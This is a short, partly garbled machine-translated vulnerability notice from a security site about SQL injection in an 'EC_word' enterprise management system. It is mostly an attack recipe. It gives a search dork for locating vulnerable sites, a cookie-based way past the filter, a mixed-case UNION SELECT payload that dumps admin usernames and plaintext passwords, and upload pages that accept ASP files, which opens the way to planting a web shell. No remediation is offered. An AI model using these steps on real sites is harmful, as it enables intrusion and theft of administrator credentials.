EC_word enterprise management system injection vulnerability-vulnerability warning-the black bar safety net

2011-07-11T00:00:00
ID MYHACK58:62201131212
Type myhack58
Reporter 佚名
Modified 2011-07-11T00:00:00

Description

Keywords: inurl:pro_show. asp? showid=

The program uses maple General-purpose anti injection 1. 0asp Edition, this anti-injection completely tasteless, the site program pro_show. asp with cookies to injection, or variant of the injection, before injection can first determine what number of fields: ORdeR By xx

Injected statement: ANd 1=1 UNiOn SElEcT 1,username,3,4,5,6,7,8,9,1 0,password1,1 2,1 3,1 4,1 5,1 6,1 7,1 8,1 9,2 0,2 1,2 2,2 3,2 4,2 5 FrOm lei_admin

The password is plaintext, the background address: admin/index/login. asp

Background upload address: admin/inc/upfile.htm you can directly upload asp file upload path admin/upimg/ Some background there are double file upload vulnerability: admin/inc/upfiletwo. asp

Some background there eweb editor